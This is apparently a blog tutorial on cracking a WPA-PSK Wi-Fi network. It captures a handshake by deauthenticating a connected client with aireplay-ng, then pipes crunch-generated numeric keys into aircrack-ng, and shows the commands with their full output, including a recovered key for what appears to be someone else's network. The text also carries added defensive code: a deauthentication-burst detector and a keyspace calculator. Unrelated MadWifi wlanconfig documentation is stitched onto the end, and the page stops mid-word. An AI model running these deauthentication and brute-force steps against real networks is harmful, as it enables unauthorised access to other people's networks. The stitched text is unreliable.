
Cracking WPA and WPA2 with crunch


A while ago people had been asking me to put together a tutorial on how to crack networks with WPA and WPA2 encryption, so I decided to write this one using a tool that replaces dictionaries and which, in my case, has been quite effective. Let's start by making a couple of things clear. WEP encryption, as we already know, is easy to break: packets are captured and then, by reverse-engineering those packets, the key is recovered from them. WPA and WPA2 are different, and that method cannot be used. These ciphers use something called a "handshake", a kind of "greeting" between the AP (Access Point) and the client. What we need to capture in this case is precisely that handshake, because it carries the material needed to check key guesses offline; with it we can then try to break the key with a dictionary or, in this case, with the other method I use. With that explained, here is the method. I am going to use a program called "crunch". Download it from here: DOWNLOAD CRUNCH

Once downloaded, unpack it:
    tar -xvzf crunch*.tgz

Enter the directory:
    cd crunch

Compile it. Just in case, first install build-essential if you do not have it:
    apt-get install build-essential

Now compile it:
    make

    make install

Finally, copy the binary to sbin:
    cp crunch /usr/sbin/

I will assume you already have aircrack-ng installed, but since I'm nice, here is the apt-get just in case:
    apt-get install aircrack-ng

Let's begin!!

Put the card in promiscuous (monitor) mode (in my case the interface is ath1; use your own):
    airodump-ng ath1

A few networks show up (a "?" marks a hex digit that was lost when this page was extracted):

 CH  6 ][ Elapsed: 4 s ][ 2010-07-11 23:44

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER AUTH ESSID

 00:1B:11:?3:A9:5D    2        2      0    0   1  54 .  WEP   WEP         dlink-007
 00:14:BF:79:8B:3C    5        2      0    0   6  54    WPA2  CCMP   PSK  PORINGA
 00:21:29:EB:57:85    2        0      0    0   6  54    OPN               Nazario_w
 00:21:29:96:85:0C    9        3      1    0   6  54e   WEP   WEP         Martin
 00:1A:70:3D:3D:81    3        2      0    0   6  54    OPN               linksys
 00:1C:10:2A:C7:99    5        3      0    0   6  54e   OPN               Nazario_w
 00:18:E7:56:26:89    7        4      0    0   6  54 .  WPA   TKIP   PSK  default
 00:26:5A:53:E5:84    4        4      0    0   6  54    WEP   WEP         AR-RED
 00:1D:7E:22:25:22   -1        0      3    1   6  -1    OPN               <length:
 00:18:E7:61:A9:47    8        3      0    0   6  54 .  WPA   TKIP   PSK  ESTUDIO J
 00:0A:E5:79:83:E8    1        4      1    0  11  11    WEP   WEP         CIBERA
 00:21:29:72:?C:32    5        3      0    0  11  54 .  WEP   WEP         linksys
 00:0F:A3:?1:9C:5B   21        6      0    0  12  54 .  WEP   WEP         LKSA
 00:25:9C:69:97:B7   16       12      0    0  11  54e   WPA2  TKIP   PSK  WIPS
 00:0F:A3:?1:67:8A    6        6      0    0   4  54 .  WEP   WEP         Wi-Fi Arn
 1C:AF:?7:42:E1:E6   -1        0      0    0   9  -1                      <length:
 00:15:63:11:69:90   16       10      0    0   9  12e.  WEP   WEP         <length:
 00:25:9C:3B:69:28   23       15      0    0   6  54e   WEP   WEP         Apicc
 00:40:77:BB:55:03   21       19      0    0   6  54e   WPA   TKIP   PSK  dd-wrt
 00:21:00:61:B9:12    1        2      0    0   1  54    OPN               FT89769

I swear the ESSID PORINGA is not mine!! OK, let's continue. The one I am going to use is "default", which has WPA TKIP PSK encryption: TKIP (Temporal Key Integrity Protocol), PSK (Pre-Shared Key).

Once we have the AP's MAC and its channel, we run:
    airodump-ng -c CHANNEL-NUMBER --bssid MAC-OF-THE-AP -w default ath1

In this case:
    airodump-ng -c 6 --bssid 00:18:E7:56:26:89 -w default ath1

Now airodump will only listen on that channel and to that AP:

 CH  6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB    ENC  CIPHER AUTH ESSID

 00:18:E7:56:26:89    9  90     4152      762    5   6  54 .  WPA  TKIP   PSK  defau

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:18:E7:56:26:89  00:0C:41:7A:77:43   51  11 - 1     42     1102
 00:18:E7:56:26:89  00:1F:E1:23:33:40   15   0 - 1      0       61  default

Here we have two possible scenarios:

1) Wait for a new client to connect, in order to capture the handshake.
2) Deauthenticate an already connected client so that it reconnects, and capture the handshake then.

In this case we will use the second option. Note down the AP's MAC and the connected client's MAC:

    AP: 00:18:E7:56:26:89
    Connected client: 00:0C:41:7A:77:43

We deauthenticate the client with this command:
    aireplay-ng -0 10 -a MAC-OF-THE-AP -c MAC-OF-THE-CLIENT ath1

In this case:
    aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1

It does something like this:

    [root@debian dke]# aireplay-ng -0 10 -a 00:18:E7:56:26:89 -c 00:0C:41:7A:77:43 ath1
    23:46:18  Waiting for beacon frame (BSSID: 00:18:E7:56:26:89) on channel 6
    23:46:19  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 1|173 ACKs]
    23:46:20  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [14|155 ACKs]
    23:46:20  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|207 ACKs]
    23:46:21  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [11|173 ACKs]
    23:46:21  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [31|186 ACKs]
    23:46:26  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|240 ACKs]
    23:46:27  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 3|186 ACKs]
    23:46:27  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|137 ACKs]
    23:46:28  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [ 0|147 ACKs]
    23:46:32  Sending 64 directed DeAuth. STMAC: [00:0C:41:7A:77:43] [19|258 ACKs]

If it does not get deauthenticated on the first try, repeat the command. Once the user has been deauthenticated and reconnects, the handshake shows up at the top right:
    CH 6 ][ Elapsed: 9 mins ][ 2010-07-11 23:53 ][ WPA handshake: 00:18:E7:56:26:89
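From the defender's side, the step above is the noisy part of the procedure: a wireless IDS sees a deauthentication burst as many 802.11 Deauthentication (or Disassociation) management frames for one AP/station pair in a short time, something no client or AP generates on its own. The following detector is an added example, not part of the original post or of aircrack-ng. It runs over a constructed list of already-parsed frame records (timestamp, management subtype, BSSID, station) rather than a live capture; the record layout, the 5-second sliding window and the 20-frame threshold are assumptions made for this illustration, and the MAC addresses reuse the ones from the capture above as sample values.

```python
"""Detect a directed deauthentication burst like the one shown above.

Added example; not part of the original post or of aircrack-ng. The record
layout (ts_seconds, subtype, bssid, station), the window and the threshold
are assumptions made for this illustration."""
from collections import defaultdict, deque

DEAUTH = 0x0C     # 802.11 management frame subtype: Deauthentication
DISASSOC = 0x0A   # Disassociation, handled the same way
BEACON = 0x08     # ignored by the detector; present only in the sample


def find_deauth_bursts(frames, window_s=5.0, threshold=20):
    """Return {(bssid, station): (first_ts, count)} for every pair whose
    deauth/disassoc frames inside a sliding `window_s`-second window reach
    `threshold`. `frames` are (ts_seconds, subtype, bssid, station) tuples in
    time order; the stored tuple is the window state at the moment of the alert."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, subtype, bssid, sta in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        key = (bssid.upper(), sta.upper())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:   # drop frames older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = (q[0], len(q))
    return alerts


def constructed_capture():
    """Constructed sample, not a real capture: AP beacons every 100 ms, one
    legitimate disconnect, then a 64-frame directed deauth burst within 0.64 s."""
    ap, victim, other = "00:18:E7:56:26:89", "00:0C:41:7A:77:43", "00:1F:E1:23:33:40"
    frames = [(i * 0.1, BEACON, ap, "FF:FF:FF:FF:FF:FF") for i in range(1200)]
    frames.append((30.0, DEAUTH, ap, other))  # a client leaving normally
    frames += [(100.0 + i * 0.01, DEAUTH, ap, victim) for i in range(64)]
    frames.sort(key=lambda f: f[0])
    return frames


if __name__ == "__main__":
    for (bssid, sta), (first, n) in find_deauth_bursts(constructed_capture()).items():
        print(f"ALERT deauth burst {bssid} -> {sta}: {n} frames from t={first:.2f}s")
```

The single disconnect at t=30 never reaches the threshold, while the burst trips the alert on its 20th frame, about 0.2 s after it starts. Counting per (BSSID, station) pair rather than per BSSID keeps a busy AP with many clients leaving from looking like an attack. The mitigation that removes the problem rather than just detecting it is 802.11w (Protected Management Frames), which authenticates deauthentication and disassociation frames so that forged ones are discarded by the client.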

Done, we have our handshake; now we use crunch:

We type this (-b takes the AP's MAC, the BSSID shown next to the handshake):
    crunch 8 9 0123456789 | aircrack-ng -a 2 PATH-TO-THE-CAP-FILE -e default -b MAC-OF-THE-AP -w -

In this case:
    crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -

Clarification: "crunch 8 9" refers to the fact that WPA keys have at least 8 characters; in this case I only want it to try up to 9 characters, and to use the digits 0123456789. 75% of users make the mistake of "securing" the network with WPA and then using a numeric key, and here we are going to see how easy those are to obtain with crunch. If we wanted crunch to use letters, we would put "crunch 8 15 abcdefghijklmno" (15 characters maximum). Now let's see how crunch starts generating keys and testing them with aircrack-ng:

    [root@debian dke]# crunch 8 9 0123456789 | aircrack-ng -a 2 /home/dke/defa*.cap -e default -b 00:18:E7:56:26:89 -w -
    Opening /home/dke/default-01.cap
    Reading packets, please wait...

                                     Aircrack-ng 1.0 rc3

                       [00:00:50] 72172 keys tested (1445.33 k/s)

                               KEY FOUND! [ 00072169 ]

          Master Key     : F0 BE A1 08 A5 4C D6 E4 08 5C 5F B4 42 4A 69 F0
                           32 1D C9 11 D5 F3 BB 64 3D F2 31 AB FA F7 A7 1E

          Transient Key  : 72 42 D4 F0 91 91 E9 27 F8 8E D0 DF 1D 48 1B AD
                           16 10 78 D5 B1 7E 8D 9E 7A 76 68 AC 44 2A 37 94
                           30 4C 47 F5 FE EB 01 7E 8B 64 87 EF 78 3D 2F 1E
                           E8 6B 4A 2E E4 95 F4 57 4A 32 05 54 66 AA D6 98

          EAPOL HMAC     : C8 28 B2 83 87 05 18 45 D8 26 C0 42 1D AB A0 7D

Done, we have the key.
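The "crunch 8 9" explanation above and the 1445.33 k/s figure in the aircrack-ng output are enough to put numbers on why an all-digit passphrase is the weak choice the author describes. The following calculator is an added example, not code from the original post or from crunch. It reproduces crunch's keyspace arithmetic (every length from MIN to MAX over the character set) and divides by the observed rate; the comparison policies and the function names are constructed for this illustration, and the rate is simply a parameter, so a faster cracker changes the numbers but not the shape of the result.

```python
"""Keyspace size and time-to-exhaust for `crunch MIN MAX CHARSET | aircrack-ng`.

Added example, not from the original post or from crunch. CRACK_RATE is the
rate reported by the aircrack-ng run on this page; POLICIES are constructed
for comparison. WPA passphrases are 8 to 63 characters, hence the floor of 8."""

CRACK_RATE = 1445.33e3  # keys per second, from the aircrack-ng output above


def keyspace(min_len, max_len, charset_size):
    """Candidates crunch emits: sum of charset_size**L for L in [min_len, max_len]."""
    if min_len < 8:
        raise ValueError("WPA passphrases are at least 8 characters")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def seconds_to_exhaust(min_len, max_len, charset_size, rate=CRACK_RATE):
    """Worst-case time to try the whole keyspace at `rate` keys per second."""
    return keyspace(min_len, max_len, charset_size) / rate


def human_duration(seconds):
    """Largest unit that fits, one decimal, e.g. 761.07 -> '12.7 minutes'."""
    for name, size in (("years", 365.25 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {name}"
    return f"{seconds:.1f} seconds"


POLICIES = [
    # (label, min_len, max_len, charset_size): constructed comparison set
    ("digits only, 8-9 chars (the post's crunch 8 9 0123456789)", 8, 9, 10),
    ("letters a-o, 8-15 chars (the post's crunch 8 15 abcdefghijklmno)", 8, 15, 15),
    ("lowercase a-z, 8 chars", 8, 8, 26),
    ("lowercase + digits, 10 chars", 10, 10, 36),
    ("all 95 printable ASCII, 12 chars", 12, 12, 95),
]


def report(rate=CRACK_RATE):
    """[(label, keyspace, seconds_to_exhaust)] for each policy at `rate`."""
    return [(label, keyspace(lo, hi, cs), seconds_to_exhaust(lo, hi, cs, rate))
            for label, lo, hi, cs in POLICIES]


if __name__ == "__main__":
    for label, size, secs in report():
        print(f"{label:<68} {size:>24,d}  {human_duration(secs)}")
```

At the page's rate the digits-only 8-to-9 keyspace (1.1 billion candidates) is exhausted in under 13 minutes, which is why the key 00072169 fell after 50 seconds, while the letter policy the author mentions already runs to thousands of years and a 12-character passphrase over the full printable set is out of reach by many orders of magnitude. The rate is bounded by PBKDF2-HMAC-SHA1 with 4096 iterations per candidate, so the only lever the network owner controls is the size of the keyspace: length and character variety of the PSK.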

A video I recorded for the clueless, and because of the crappy faces that show up in it..

Using wlanconfig
The current MadWifi driver supports multiple APs and concurrent AP/Station mode operation on the same device. The devices are restricted to using the same underlying hardware, and are thus limited to coexisting on the same channel and using the same physical layer features. Each instance of an AP or station is called a Virtual AP (or VAP). Each VAP can be in AP mode, station mode, "special" station mode, or monitor mode. Every VAP has an associated underlying base device, which is created when the driver is loaded.

Creating and destroying VAPs is done through the wlanconfig tool found in the MadWifi tools directory. Running the wlanconfig utility with no arguments returns a brief help line. The wlanconfig command takes two forms:

wlanconfig VAP create wlandev BaseDevice wlanmode mode [bssid|-bssid] [nosbeacon]
wlanconfig VAP destroy

Every Linux network device consists of a prefix followed by a number indicating the device number of the network device. For instance, the ethernet devices are named eth0, eth1, eth2, etc. Each VAP which is created is also registered as a Linux network device. The value VAP can be either a prefix name of the Linux network device, or it can be the entire device name. For instance, specifying VAP as ath lets the Linux kernel add the network device as the next device with the prefix ath. Thus, the Linux kernel appends the proper number to the end to form the full device name, e.g., ath1 if ath0 already exists. However, the full device name can also be specified. For instance, VAP can also be ath2. In this case, the network device ath2 is registered, regardless of whether ath1 exists.

The Base Device is the underlying wireless network device name created when the driver is loaded. The MadWifi driver creates wifi0, wifi1, etc. as the underlying devices. By specifying the Base Device, the VAP is created with the Base Device as its parent device. The mode is the operating mode of the VAP. The operating mode of a VAP cannot be changed once it is created. In special cases, the operating mode of the VAP can differ from the operating mode of the underlying parent device. The first VAP which is created sets the operating mode of the underlying device. If the first VAP is deleted and a new VAP is created with a different operating mode than the original VAP, then the operating mode of the underlying device is changed to the new operating mode. The valid operating modes and their descriptions are given in the table below.

Table: wlanconfig Operating Modes

Mode      Description
Auto      Auto select operating mode
Managed   Station mode for infrastructure networks
Master    AP mode
Monitor   Passive monitor (promiscuous) mode

Only one station VAP can exist on a device. If the station VAP is the first VAP created, then no other VAPs are allowed to be created. If the first VAP created is in AP (Master) mode, then one station VAP is allowed to be created. In this case, other AP VAPs can also be created after the station VAP. When AP and station VAPs coexist, the nosbeacon flag must be used when creating the station. This flag disables the use of hardware beacon timers for station mode operation. This is necessary because concurrent AP and station operation implies the station should not modify the TSF clock for the APs. Creating multiple VAPs typically implies that the MAC address of each VAP is different. However, if the -bssid flag is used, then the MAC address of the underlying wireless device is cloned for the VAP being created. To destroy a VAP, the wlanconfig command is used with the destroy parameter. In this case, the full device name must be used, i.e. you must specify the entire name, not just the device prefix.
Example: If we wish to use the system as a station only, we would create a single station VAP once the driver is loaded. The following command creates a single station VAP named ath0 on device wifi0:

myprompt# wlanconfig ath create wlandev wifi0 wlanmode sta

Note that no other VAPs can be created, since we are assuming this is the first VAP created on wifi0. Since this is the first VAP created, we only need to specify ath, not ath0. However, the following command would also be correct:

myprompt# wlanconfig ath0 create wlandev wifi0 wlanmode sta

The MAC address of the station VAP is the same as the underlying device's MAC address, since it is the first VAP created.

Example: Now, we wish to create two AP VAPs on device wifi0. The first VAP will have a MAC address cloned from the underlying device. The second VAP will have a "virtual" MAC address formed from the underlying device's MAC address. The first VAP will be ath0 and the second will be ath2.

myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap
myprompt# wlanconfig ath2 create wlandev wifi0 wlanmode ap

Example: Now, we wish to create two AP VAPs on device wifi0. Both VAPs will have the same MAC address, cloned from the underlying device. The first VAP will be ath0 and the second VAP will be ath1.

myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap -bssid
myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap -bssid

Example: Now, we wish to create two AP VAPs and one station VAP. The AP VAPs will be ath0 and ath2, and the station VAP will be ath1.

myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap
myprompt# wlanconfig ath create wlandev wifi0 wlanmode sta nosbeacon
myprompt# wlanconfig ath create wlandev wifi0 wlanmode ap

Example: Now, we wish to destroy a VAP (regardless of its operating mode). We assume that there is a VAP named ath0, and it is the one we wish to destroy.

myprompt# wlanconfig ath0 destroy
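The creation rules spread over the paragraphs above (first VAP sets the device mode, a lone station VAP blocks everything else, one station beside APs and only with nosbeacon, prefix versus full-name registration, -bssid cloning, destroy needing the full name) are easier to check against the examples when written as one small model. The class below is an added example; it is not part of the MadWifi documentation or tools, and its class and method names are invented for this illustration. It encodes only what the text states: MAC addresses are tracked as "base" (cloned from the underlying device) or "virtual" because the text does not give the derivation, and a monitor VAP created first is assumed to follow the AP rules since the text does not cover that case.

```python
"""Model of the wlanconfig VAP creation rules described above.

Added example; not part of the MadWifi documentation or tools. Names are
invented for this illustration. MACs are tracked only as "base"/"virtual";
a monitor VAP created first is assumed to behave like an AP VAP."""
import re


class VapTable:
    def __init__(self, base_dev="wifi0", prefix="ath"):
        self.base_dev = base_dev
        self.prefix = prefix
        self.vaps = {}         # device name -> {"mode": ..., "mac": ...}
        self.base_mode = None  # operating mode of the underlying device

    def _register_name(self, name):
        """'ath' -> next free athN (kernel appends the number); 'athN' -> that
        exact name, if it is free."""
        if name == self.prefix:
            n = 0
            while f"{self.prefix}{n}" in self.vaps:
                n += 1
            return f"{self.prefix}{n}"
        if not re.fullmatch(re.escape(self.prefix) + r"\d+", name):
            raise ValueError(f"bad VAP name {name!r}")
        if name in self.vaps:
            raise ValueError(f"{name} already exists")
        return name

    def create(self, name, mode, nosbeacon=False, bssid=False):
        """Mimic `wlanconfig NAME create wlandev BASE wlanmode MODE [-bssid]
        [nosbeacon]`; returns the registered device name or raises ValueError."""
        if mode not in ("ap", "sta", "monitor"):
            raise ValueError(f"unknown wlanmode {mode!r}")
        existing_modes = [v["mode"] for v in self.vaps.values()]
        if existing_modes:
            if self.base_mode == "sta":
                raise ValueError("a station VAP created first allows no other VAPs")
            if mode == "sta":
                if "sta" in existing_modes:
                    raise ValueError("only one station VAP can exist on a device")
                if "ap" in existing_modes and not nosbeacon:
                    raise ValueError("nosbeacon is required for a station VAP "
                                     "coexisting with AP VAPs")
        dev = self._register_name(name)
        first = not self.vaps
        if first:
            self.base_mode = mode  # the first VAP sets the underlying device's mode
        # first VAP, or -bssid given: MAC cloned from the base device; else virtual
        self.vaps[dev] = {"mode": mode, "mac": "base" if (first or bssid) else "virtual"}
        return dev

    def destroy(self, name):
        """Mimic `wlanconfig NAME destroy`; the full device name is required."""
        if name not in self.vaps:
            raise ValueError(f"{name!r} is not the full name of an existing VAP")
        del self.vaps[name]
        if not self.vaps:
            self.base_mode = None  # the next first VAP may pick a new mode

    def mac(self, name):
        return self.vaps[name]["mac"]


def rejected(fn, *args, **kwargs):
    """True if the wlanconfig-style call is refused by the rules above."""
    try:
        fn(*args, **kwargs)
    except ValueError:
        return True
    return False
```

Replaying the page's own example sequences through the model gives the names the text predicts (ath0, ath1, ath2 for the two-AP-plus-station case; ath0 then ath2 then ath1 when ath2 is named explicitly) and refuses exactly the cases the text forbids, such as a second VAP after a station-only setup or a station beside APs without nosbeacon.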


root 2005-12-16


New MadWifi Code From Atheros


This page is a brief description of the features of the latest code from Atheros.

License and HAL


The license for the driver has not changed. It is still dual BSD / GPL v2 licensed. The About/HAL is still binary only and will still taint the kernel. More information on the About/HAL page.

New Features
Enhanced Chipset Support

The About/HAL that comes along with the new code now supports almost all of the chipsets that are currently available. There should be a new HAL soon which supports all of them except for USB chipsets.
VAPs and wlanconfig

The most interesting new feature is probably the introduction of Virtual AP (VAP) mode, which allows the operation of multiple concurrent (virtual) access points, and concurrent running in both AP and station mode. VAPs sit on top of a base device (usually called wifi0). This base device will be the first device you see when the drivers load, and is not linked to the wireless extensions. Beware that ifrename might change the device name from wifi0 to something else if you installed and configured it to rename interfaces based on your device's MAC address. The initial kernel messages from ath_pci will still report wifi0, though. To manipulate VAPs, Madwifi comes with a tool called wlanconfig which is used to create and destroy VAPs with various different modes. As of SVN r1407, a sta VAP (Managed mode interface) is created by default; please see the Autocreate page for more details about manipulating the autocreation process. A typical wlanconfig command might look like the following (which creates the device ath0 as a normal 'station mode' VAP):
wlanconfig ath0 create wlandev wifi0 wlanmode sta

If the 0 from ath0 were omitted, wlanconfig would start creating devices using the first available index. If you get an error (wlanconfig: ioctl: Invalid argument) when specifying an index, not specifying an index may work (!). To create an access point, use:
wlanconfig ath0 create wlandev wifi0 wlanmode ap

To create an access point, _and_ a station, use:

wlanconfig ath0 create wlandev wifi0 wlanmode ap
wlanconfig ath1 create wlandev wifi0 wlanmode sta nosbeacon

To create APs which share a single MAC address, use the -bssid flag when creating the VAPs:

wlanconfig ath0 create wlandev wifi0 wlanmode ap -bssid
wlanconfig ath1 create wlandev wifi0 wlanmode ap -bssid

Finally, to destroy a VAP, issue the command:

wlanconfig ath0 destroy

Note that the whole interface name is needed. Also note that this feature will work with any supported chipset.

WDS, XR, Compression etc.


Madwifi co
